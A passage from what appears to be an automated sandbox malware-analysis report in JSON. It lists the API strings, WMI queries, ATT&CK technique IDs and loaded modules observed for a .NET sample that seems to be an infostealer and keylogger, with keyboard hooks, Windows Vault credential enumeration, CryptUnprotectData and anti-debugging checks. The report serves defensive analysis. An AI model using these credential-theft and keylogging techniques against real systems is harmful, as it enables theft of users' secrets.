\"ToUnicodeEx\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"MapVirtualKey\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CheckRemoteDebuggerPresent\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"MessageBox\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateMutex\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetWindowText\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetThreadExecutionState\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RtlSetProcessIsCritical\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"Local State\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateDirectory\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendARP\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendMessage\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempPath\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultOpenVault\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultCloseVault\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultFree\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultEnumerateItems\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultGetItem\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptOpenAlgorithmProvider\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptCloseAlgorithmProvider\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptGetProperty\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptSetProperty\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptImportKey\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptDestroyKey\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptEncrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetParent\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempFileName\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcessById\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetWindowsHookEx\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnhookWindowsHookEx\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CallNextHookEx\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyState\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardState\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardLayout\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"ToUnicodeEx\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"MapVirtualKey\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CheckRemoteDebuggerPresent\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"MessageBox\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateMutex\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowText\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetThreadExecutionState\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlSetProcessIsCritical\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"GetAntivirus\" (Indicator: \"antivirus\") in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp\n \"Antivirus\" (Indicator: \"antivirus\") in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"Select ProcessorId From Win32_processor\" (Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp, Indicator: \"select processorid from win32_processor\")\n \"SELECT * FROM win32_operatingsystem\" (Source: 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp, Indicator: \"select * from win32_operatingsystem\")\n \"SELECT * FROM win32_operatingsystem\" (Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp, Indicator: \"select * from win32_operatingsystem\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"set_UseShellExecute\" (Indicator: \"ShellExecute\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"set_UseShellExecute\" (Indicator: \"ShellExecute\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"set_UseShellExecute\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"Select ProcessorId From Win32_processor\" (Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp, Indicator: \"select processorid from win32_processor\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"HARDWARE\\Description\\System\\CentralProcessor\\0\" in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp\n \"System\\CurrentControlSet\\Control\\Nls\\RegionMapping\" in Source: 00000000-00005100.00000000.131007.01A60000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\AppContext\" in Source: 00000000-00005100.00000000.131007.01A60000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"GDI32.DLL\" at base 76500000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75620000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ad0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"KERNEL32\" at base 75ef0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"ADVAPI32.DLL\" at base 75e40000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6b840000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"SHLWAPI.DLL\" at base 76280000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"VERSION.DLL\" at base 74780000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORWKS.DLL\" at base 64e80000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"USER32.DLL\" at base 762e0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"MSCOREE.DLL\" at base 6ca00000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"NTDLL\" at base 773e0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"SHELL32.DLL\" at base 76550000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"OLE32.DLL\" at base 75b40000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"KERNEL32.DLL\" at base 75ef0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77330000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"PROFAPI.DLL\" at base 75300000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MSCORLIB\\9F895C66454577EFF9C77442D0C84F71\\MSCORLIB.NI.DLL\" at base 64380000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\OLE32.DLL\" at base 0\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"CRYPTBASE.DLL\" at base 751e0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d90000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORJIT.DLL\" at base 6ae30000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM\\AD92DAB7F418877D6A1E0358CE35658A\\SYSTEM.NI.DLL\" at base 63bd0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MICROSOFT.VISUALBAS#\\6F5BF6427122BFC30B5BE76BCD651018\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 6ac90000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75190000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"USER32\" at base 762e0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"RPCRT4.DLL\" at base 77260000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77330000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"CRYPTSP.DLL\" at base 74cf0000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a80000\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75280000\n \"577.exe\" loaded module \"GDI32.DLL\" at base 76500000\n \"577.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75620000\n \"577.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ad0000\n \"577.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"577.exe\" loaded module \"KERNEL32\" at base 75ef0000\n \"577.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"577.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c180000\n \"577.exe\" loaded module \"ADVAPI32.DLL\" at base 75e40000\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6b840000\n \"577.exe\" loaded module \"SHLWAPI.DLL\" at base 76280000\n \"577.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"577.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"577.exe\" loaded module \"VERSION.DLL\" at base 74780000\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 63420000\n \"577.exe\" loaded module \"USER32.DLL\" at base 762e0000\n \"577.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"577.exe\" loaded module \"MSCOREE.DLL\" at base 6ca00000\n \"577.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"577.exe\" loaded module \"PSAPI.DLL\" at base 77310000\n \"577.exe\" loaded module \"RPCRT4.DLL\" at base 77260000\n \"577.exe\" loaded module \"KERNEL32.DLL\" at base 75ef0000\n \"577.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 62010000\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"577.exe\" loaded module \"OLE32.DLL\" at base 75b40000\n \"577.exe\" loaded module \"CRYPTBASE.DLL\" at base 751e0000\n \"577.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6d890000\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6ac00000\n \"577.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 615b0000\n \"577.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 60d90000\n \"577.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 68310000\n \"577.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 60610000\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6d290000\n \"577.exe\" loaded module \"NTDLL.DLL\" at base 773e0000\n \"577.exe\" loaded module \"SHELL32.DLL\" at base 76550000\n \"577.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77330000\n \"577.exe\" loaded module \"PROFAPI.DLL\" at base 75300000\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"577.exe\" loaded module \"BCRYPT.DLL\" at base 74e00000\n \"577.exe\" loaded module \"CRYPTSP.DLL\" at base 74cf0000\n \"577.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a80000\n \"577.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter AdvApi32.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System\\ad92dab7f418877d6a1e0358ce35658a\\System.ni.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.VisualBas#\\6f5bf6427122bfc30b5be76bcd651018\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001916)\n \"577.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005100)\n \"577.exe\" called 